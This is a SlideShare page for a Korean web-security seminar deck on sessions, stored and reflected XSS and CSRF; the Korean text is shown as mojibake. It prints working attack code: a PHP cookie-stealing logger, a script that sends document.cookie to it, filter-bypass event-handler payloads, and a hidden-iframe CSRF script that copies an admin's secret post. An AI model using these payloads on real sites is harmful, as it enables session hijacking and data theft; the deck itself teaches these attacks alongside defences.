SlideShare a Scribd company logo
Web vulnerability seminar
from make to exploit
Contents
$ PHP + Source code auditing
$ DB & SQL injection
$ XSS & CSRF
$ Something Injection
ใ……..์„ธ..์„ธ์…˜
$ ์„œ๋ฒ„์™€ ์œ ์ €๊ฐ„์˜ ์—ฐ๊ฒฐ
$ ์„œ๋ฒ„์—๊ฒŒ ๋‚ด๊ฐ€ โ€˜๋‚˜โ€™ ๋ผ๋Š”๊ฑธ ์ฆ๋ช… ํ•˜๋Š” ๊ฒƒ
PHP SESSION
โ€ข ์ฟ ํ‚ค -> PHPSESSID
โ€ข ์ด์ƒํ•œ ๋ฌธ์ž์—ด
๋ฐ์ž๋ทฐ
$ ๋กœ๊ทธ์ธ -> COOKIE
$ COOKIE -> ์‚ญ์ œ -> ์•ˆ ๋กœ๊ทธ์ธ
$ COOKIE-> ์•ˆ ์‚ญ์ œ -> ๋กœ๊ทธ์ธ
ใ…Žใ…Ž ๊ด€๋ฆฌ์ž
$ ์ œ ์•„์ด๋””๋กœ ๊ธ€์„ ์“ฐ์„ธ์š”
$ ??/web/3/
๋งŒ์•ฝ..
๊ฒŒ์‹œ๊ธ€์„ ์ฝ์„๋•Œ
์š”์ฒญ
๊ทธ๋ฆผ์ฃผ์†Œ = โ€˜domain.com/monday.jpgโ€™
๋ฌธ์ œ๊ฐ€ ๋˜๋Š” ๊ฒƒ?
$ ์•„์ง๊นŒ์ง€ ์—†์Œ
๊ธ€์„ ์ด์˜๊ฒŒ
๋ฌธ์ œ๊ฐ€ ๋˜๋Š”๊ฒƒ?
$ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์ ํžŒ๋‹ค๋Š” ๊ฒƒ์€ ๋‚ด๊ฐ€ ์›ํ•˜๋Š” ํ–‰
๋™์„ ์ผ๋ถ€ ํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ์ด์•ผ๊ธฐ.
$ ํ˜„์žฌ ํŽ˜์ด์ง€์—์„œ ์ƒ๋Œ€๋ฐฉ์ด ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ์ฟ 
ํ‚ค(์„ธ์…˜) ๊ฐ’์„ ๋‚ด ์„œ๋ฒ„๋กœ ์ „์†กํ•ด์„œ ๊ธฐ๋ก ํ• 
์ˆ˜ ์žˆ๋‹ค๋ฉด?
Stored XSS ๊ฐœ์š”
1
2
3
4
๊ฐ„๋‹จํ•œ ํ…Œ์ŠคํŠธ!
<script>alert(โ€œtestโ€)</script>
<script>alert(document.cookie)</script>
<iframe src=โ€˜โ€™/>
โ€ฆ
PHP
<?
$hijack = "rn".$_GET[โ€˜k']." :
".date("Y-m-d h:i:s");
$f = fopen("./cookie.txt","a");
fwrite($f,$hijack,strlen($hijack));
fclose($f);
?>
Payload
<script>location.href=โ€˜http://path/cookie.p
hp?k=โ€˜+document.cookie</script>
With filtering 1
Source
$q = str_replace("script","",$_GET[inp]);
echo $q;
192.168.1.25/web/xss/test.php
With filtering 2
Source
$q = $_GET[inp];
if(eregi("script",$q))
exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test2.php
With filtering 3
Source
$q = $_GET[inp];
if(eregi("script|alert",$q))
exit("HAHA. Do not try XSS");
echo $q;
192.168.1.25/web/xss/test3.php
์ž์—ฐ์Šค๋Ÿฝ๊ฒŒ ๊ธ€์„ ์“ฐ๋ฉด์„œ
$ <img src = โ€˜โ€™ onload =โ€˜โ€™>
$ <img src = โ€˜โ€™ onerror =โ€˜โ€™>
$ <img src = โ€˜โ€™ onmouseover=โ€˜โ€™>
โ€ฆ
Reflected XSS
$ Stored์™€ ๋‹ฌ๋ฆฌ ์ €์žฅํ•  ๊ณต๊ฐ„์ด ์—†์–ด๋„ ๊ฐ€๋Šฅ
$ Stored์™€ ๊ฐ™์€ ํ–‰๋™์ด ๋ชจ๋‘ ๊ฐ€๋Šฅํ•จ
์žฌํƒ•
๊ทธ๋ฆผ์ฃผ์†Œ = โ€˜domain.com/monday.jpgโ€™
Reflected XSS ๊ฐœ์š”
1
3
2
4
XSS = XSS
$ Stored๋กœ ๊ฐ€๋Šฅํ•œ ๋ชจ๋“  ๊ณต๊ฒฉ์„ Reflected ๋กœ
๋„ ๊ฐ€๋Šฅํ•จ.
์‹œ๋‚˜๋ฆฌ์˜ค
$ XSS๊ณต๊ฒฉ์„ ํ™•์ธ
$ XSS ๋ฅผ ํ†ตํ•ด ์•…์„ฑ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์‚ฝ์ž…๋œ ํŽ˜์ด
์ง€๋กœ ์ด๋™
$ Reverse Connection!
ใ…Žใ…Ž
CSRF
$ XSS์—์„œ ํŒŒ์ƒ๋˜๋Š” 2์ฐจ ํ”ผํ•ด
CSRF ๊ฐœ์š”
1
2
3
4
Return To XSS
$ <script ~~>๋กœ ์„œ๋ฒ„์— ์š”์ฒญ์„ ๋ณด๋‚ด์ž!
๊ด€๋ฆฌ์ž๊ฐ€ ์ฝ๊ฒŒ ํ•˜์—ฌ ๋น„๋ฐ€๊ธ€์„ ์ฝ์–ด๋ณด์ž!
์‹ค์Šต
$ ๊ธ€์“ฐ๊ธฐ ์˜ˆ์ œ
<iframe src =
'http://127.0.0.1/web/csrf/board/write_ok.p
hp?user_id=TEST&title=qwer&pw=&conte
nts=zxcv' width=0 height=0
frameborder=0/>
๋น„๋ฐ€๊ธ€์„ ์ฝ์–ด๋ด…์‹œ๋‹ค.
1. ํ•ด๋‹น ๊ธ€์ด ์ ํžŒ ํŽ˜์ด์ง€๋ฅผ ์š”์ฒญ
2. ์š”์ฒญ๋œ ํŽ˜์ด์ง€์˜ html ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๊ฐ€์ ธ์˜ด
3. ๊ฐ€์ ธ์˜จ ์†Œ์Šค์ฝ”๋“œ๋ฅผ ๊ทธ๋Œ€๋กœ ์ ์Œ.
๋น„๋ฐ€๊ธ€์„ ๋นผ์˜ต์‹œ๋‹ค.
<script>
function sending(html)
{
var f = document.getElementById("csrf");
var a = unescape(html)
var c =
"http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&title=qwwer&pw=aa&contents="+a;
if(html != "")
f.src=c;
else
f.src ="";
}
document.write(โ€œ<iframe id =โ€˜csrfโ€™ src =http://127.0.0.1/web/csrf/board/view.php?num=70 width=0px
height=0px frameborder=0 onload =sending(this.contentWindow.document.body.innerHTML)></iframe>")
</script>
์„ค๋ช…
document.write("")
์ธ์ž๋กœ ๋“ค์–ด๊ฐ„ ๋‚ด์šฉ์„ HTML์— ์ ์Œ
๊ฐ์ข… ๋ณ€์ˆ˜ ๊ฐ’ ์‚ฌ์šฉ ๊ฐ€๋Šฅ!
IFRAME
<iframe
id =โ€˜csrfโ€™
src=http://127.0.0.1/web/csrf/board/view.php?
num=70
width=0px height=0px frameborder=0
onload=sending(this.contentWindow.documen
t.body.innerHTML)></iframe>
Function
function sending(html)
{
var f = document.getElementById("csrf");
var a = unescape(html)
var c =
"http://127.0.0.1/web/csrf/board/write_ok.php?user_id=TEST&ti
tle=qwwer&pw=aa&contents="+a;
if(html != "")
f.src=c;
else
f.src ="";
} src=http://127.0.0.1/web/csrf/board/view.php?num=70src=http://127.0.0.1/web/csrf/board/write_ok.php?user_
id=TEST&title=qwwer&pw=aa&contents=
์–ด๋–ป๊ฒŒ ํ•  ๊ฒƒ์ธ๊ฐ€
< : &lt
> : &gt
ํŠน์ˆ˜๊ธฐ๋Šฅ์„ ์žƒ์–ด๋ฒ„๋ฆฐ๋‹ค
์–ด๋–ป๊ฒŒ ๋ณผ ๊ฒƒ์ธ๊ฐ€
<script>Something Text </script>
<img src =โ€˜โ€™ onload=โ€˜โ€™/>
<img src = โ€˜evil.phpโ€™/>
CSRF ์ถ”๊ฐ€ ๋Œ€์ฑ…
$ ์š”์ฒญ์„ ๋ณด๋‚ธ ๊ฒƒ์ด ์ •๋ง ์‚ฌ๋žŒ์ธ์ง€ ํ™•์ธ
-> captcha
์š”์•ฝ
$ ๊ฒŒ์‹œํŒ์— ๋ชจ๋“  ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํ—ˆ์šฉํ•˜์ง€ ์•Š๊ณ 
๋”ฑ๋”ฑํ•˜๊ฒŒ ๊ธ€์„ ์“ฐ๊ฒŒ ํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค..
$ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ œ๊ณตํ•ด์•ผ ํ•  ๊ฒฝ์šฐ, ์ •๊ทœํ‘œํ˜„์‹
์„ ํ†ตํ•ด ์ง€์ •๋œ ํ˜•ํƒœ์—์„œ ๋ฒ—์–ด๋‚˜๋ฉด OUT!

More Related Content

PPTX
Web vulnerability seminar4
PPTX
Web vulnerability seminar2
PPTX
Web vulnerability seminar2
PDF
PHP๋ฅผ ์ด์šฉํ•œ ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ช…๋ก ๋งŒ๋“ค๊ธฐ
PDF
Class10
PPTX
MySQL๊ณผ PHP
KEY
vine webdev
PDF
Laravel แ„…แ…ฉ แ„‡แ…ขแ„‹แ…ฎแ„‚แ…ณแ†ซ แ„‰แ…ฅแ„‡แ…ฅแ„‰แ…กแ„‹แ…ตแ„ƒแ…ณ #2
Web vulnerability seminar4
Web vulnerability seminar2
Web vulnerability seminar2
PHP๋ฅผ ์ด์šฉํ•œ ๊ฐ„๋‹จํ•œ ๋ฐฉ๋ช…๋ก ๋งŒ๋“ค๊ธฐ
Class10
MySQL๊ณผ PHP
vine webdev
Laravel แ„…แ…ฉ แ„‡แ…ขแ„‹แ…ฎแ„‚แ…ณแ†ซ แ„‰แ…ฅแ„‡แ…ฅแ„‰แ…กแ„‹แ…ตแ„ƒแ…ณ #2

What's hot (20)

PDF
แ„…แ…ฆแ„‹แ…ตแ†ฏแ„‰แ…ณ แ„’แ…ชแ†ซแ„€แ…งแ†ผ แ„‡แ…งแ†ซแ„‰แ…ฎ
PPTX
MySQL ๊ธฐ์ดˆ
PPTX
Mysql old password ๊นจ๊ธฐ
PPTX
Cdr with php
PDF
Mymysql basic sql
PDF
์ œ 4ํšŒ DGMIT R&D ์ปจํผ๋Ÿฐ์Šค : REST API - ๋ฆฌ์†Œ์Šค ์ง€ํ–ฅ์  ์•„ํ‚คํ…์ฒ˜
PPTX
ํ•ดํ‚น ๊ธฐ๋ฒ•๊ณผ ๊ธฐ๋ณธ์ƒ์‹ by issac
ย 
PDF
ํŒŒ์ด์ฌ ์›น ํ”„๋กœ๊ทธ๋ž˜๋ฐ 2ํƒ„
PDF
ํŒŒ์ด์ฌ ์›นํ”„๋กœ๊ทธ๋ž˜๋ฐ 1ํƒ„
PDF
[PyConKR 2014] 30๋ถ„๋งŒ์— ๋”ฐ๋ผํ•˜๋Š” ๋™์‹œ์„ฑ ์Šคํฌ๋ž˜ํผ
PDF
MySQL delete.update
PPTX
แ„Œแ…กแ„‡แ…กแ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ธแ„แ…ณ ๊ธฐ์ดˆ
PDF
MySQL JOIN
PPTX
Nest js 101
PDF
Redis edu 2
PDF
๋ง‰ํ•˜๋Š” ์Šคํ„ฐ๋”” ์ฒซ ๋ฒˆ์งธ ๋งŒ๋‚จ Node.js
PDF
๋ง‰ํ•˜๋Š”์Šคํ„ฐ๋”” ๋‘๋ฒˆ์งธ๋งŒ๋‚จ Express(20151025)
PDF
ํŒŒ์ด์ฌ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์—ฐ๊ฒฐ 1ํƒ„
PDF
ํŒŒ์ด์ฌ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์—ฐ๊ฒฐ 2ํƒ„
PPTX
์›น ํฌ๋กค๋ง (Web scraping) ์˜ ์ดํ•ด
แ„…แ…ฆแ„‹แ…ตแ†ฏแ„‰แ…ณ แ„’แ…ชแ†ซแ„€แ…งแ†ผ แ„‡แ…งแ†ซแ„‰แ…ฎ
MySQL ๊ธฐ์ดˆ
Mysql old password ๊นจ๊ธฐ
Cdr with php
Mymysql basic sql
์ œ 4ํšŒ DGMIT R&D ์ปจํผ๋Ÿฐ์Šค : REST API - ๋ฆฌ์†Œ์Šค ์ง€ํ–ฅ์  ์•„ํ‚คํ…์ฒ˜
ํ•ดํ‚น ๊ธฐ๋ฒ•๊ณผ ๊ธฐ๋ณธ์ƒ์‹ by issac
ย 
ํŒŒ์ด์ฌ ์›น ํ”„๋กœ๊ทธ๋ž˜๋ฐ 2ํƒ„
ํŒŒ์ด์ฌ ์›นํ”„๋กœ๊ทธ๋ž˜๋ฐ 1ํƒ„
[PyConKR 2014] 30๋ถ„๋งŒ์— ๋”ฐ๋ผํ•˜๋Š” ๋™์‹œ์„ฑ ์Šคํฌ๋ž˜ํผ
MySQL delete.update
แ„Œแ…กแ„‡แ…กแ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ธแ„แ…ณ ๊ธฐ์ดˆ
MySQL JOIN
Nest js 101
Redis edu 2
๋ง‰ํ•˜๋Š” ์Šคํ„ฐ๋”” ์ฒซ ๋ฒˆ์งธ ๋งŒ๋‚จ Node.js
๋ง‰ํ•˜๋Š”์Šคํ„ฐ๋”” ๋‘๋ฒˆ์งธ๋งŒ๋‚จ Express(20151025)
ํŒŒ์ด์ฌ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์—ฐ๊ฒฐ 1ํƒ„
ํŒŒ์ด์ฌ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์—ฐ๊ฒฐ 2ํƒ„
์›น ํฌ๋กค๋ง (Web scraping) ์˜ ์ดํ•ด
Ad

Viewers also liked (15)

PDF
How to find_vulnerability_in_software
PDF
Software Security - Vulnerability&Attack
PPTX
Variables and constants
PDF
Codegate 2013 Junior - Music Player Exploit
PDF
Fuzzing sucks!
PPTX
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
PDF
Web vulnerability seminar1
PDF
์ทจ์•ฝ์ (Vulnerability) db ๊ตฌ์กฐ ์„ค๋ช…
PDF
MBFuzzer : MITM Fuzzing for Mobile Applications
PDF
Inc0gnito fuzzing for_fun_sweetchip
PPTX
0-knowledge fuzzing
PDF
Fuzzing underestimated method of finding hidden bugs
PPTX
EZ KEY_EZ
PDF
[2014 CodeEngn Conference 10] ์‹ฌ์ค€๋ณด - ๊ธ‰์ „์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค
PDF
FUZZING & SOFTWARE SECURITY TESTING
ย 
How to find_vulnerability_in_software
Software Security - Vulnerability&Attack
Variables and constants
Codegate 2013 Junior - Music Player Exploit
Fuzzing sucks!
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015
Web vulnerability seminar1
์ทจ์•ฝ์ (Vulnerability) db ๊ตฌ์กฐ ์„ค๋ช…
MBFuzzer : MITM Fuzzing for Mobile Applications
Inc0gnito fuzzing for_fun_sweetchip
0-knowledge fuzzing
Fuzzing underestimated method of finding hidden bugs
EZ KEY_EZ
[2014 CodeEngn Conference 10] ์‹ฌ์ค€๋ณด - ๊ธ‰์ „์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค
FUZZING & SOFTWARE SECURITY TESTING
ย 
Ad

Similar to Web vulnerability seminar3 (8)

PPTX
XSS ์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ณด์ž. [์‹ค์Šต ํฌํ•จ]
PDF
Amazed by aws 2nd session
PDF
XSS(Cross site scripting) - Kitworks Team Study
PDF
Web hacking ๊ฐœ์š”
PDF
Web App Security 2015.10
PDF
แ„Œแ…กแ„‡แ…ก แ„‹แ…ฐแ†ธ แ„€แ…ขแ„‡แ…กแ†ฏ แ„‰แ…ตแ„Œแ…กแ†จแ„’แ…กแ„€แ…ต (3์ฃผ์ฐจ : ์Šคํ”„๋ง ์›น ๊ฐœ๋ฐœ)
ย 
PDF
NODE.JS ๊ธ€๋กœ๋ฒŒ ๊ธฐ์—… ์ ์šฉ ์‚ฌ๋ก€ ๊ทธ๋ฆฌ๊ณ , real-time ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐœ๋ฐœํ•˜๊ธฐ
PDF
[D2 campus seminar]แ„€แ…ขแ„‡แ…กแ†ฏแ„Œแ…กแ„€แ…ก แ„แ…ฉแ†จ แ„‹แ…กแ†ฏแ„‹แ…กแ„‹แ…ฃ แ„’แ…กแ†ฏ แ„‡แ…ฉแ„‹แ…กแ†ซแ„‹แ…ตแ„‹แ…ฃแ„€แ…ต
XSS ์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ณด์ž. [์‹ค์Šต ํฌํ•จ]
Amazed by aws 2nd session
XSS(Cross site scripting) - Kitworks Team Study
Web hacking ๊ฐœ์š”
Web App Security 2015.10
แ„Œแ…กแ„‡แ…ก แ„‹แ…ฐแ†ธ แ„€แ…ขแ„‡แ…กแ†ฏ แ„‰แ…ตแ„Œแ…กแ†จแ„’แ…กแ„€แ…ต (3์ฃผ์ฐจ : ์Šคํ”„๋ง ์›น ๊ฐœ๋ฐœ)
ย 
NODE.JS ๊ธ€๋กœ๋ฒŒ ๊ธฐ์—… ์ ์šฉ ์‚ฌ๋ก€ ๊ทธ๋ฆฌ๊ณ , real-time ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐœ๋ฐœํ•˜๊ธฐ
[D2 campus seminar]แ„€แ…ขแ„‡แ…กแ†ฏแ„Œแ…กแ„€แ…ก แ„แ…ฉแ†จ แ„‹แ…กแ†ฏแ„‹แ…กแ„‹แ…ฃ แ„’แ…กแ†ฏ แ„‡แ…ฉแ„‹แ…กแ†ซแ„‹แ…ตแ„‹แ…ฃแ„€แ…ต

Web vulnerability seminar3